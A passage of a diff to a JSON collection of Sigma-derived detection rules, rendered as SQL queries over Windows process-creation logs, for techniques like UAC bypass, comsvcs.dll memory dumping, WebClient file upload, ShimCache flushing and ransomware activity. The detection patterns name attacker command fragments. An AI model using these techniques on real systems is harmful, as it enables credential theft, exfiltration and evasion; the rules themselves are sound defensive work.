'4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.collection", - "attack.t1123" + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." 
+ "Legitimate use of dnx.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "status": "test", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.g0020", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027.004" ], "falsepositives": [ - "Unlikely" + "Utilization 
of this tool should not be seen in enterprise environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE 
'\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Suspicious Execution of Taskkill", + "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_taskkill_execution.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects execution of php 
using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "author": "Florian Roth (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1036" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "status": "experimental", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR 
CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE 
'%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
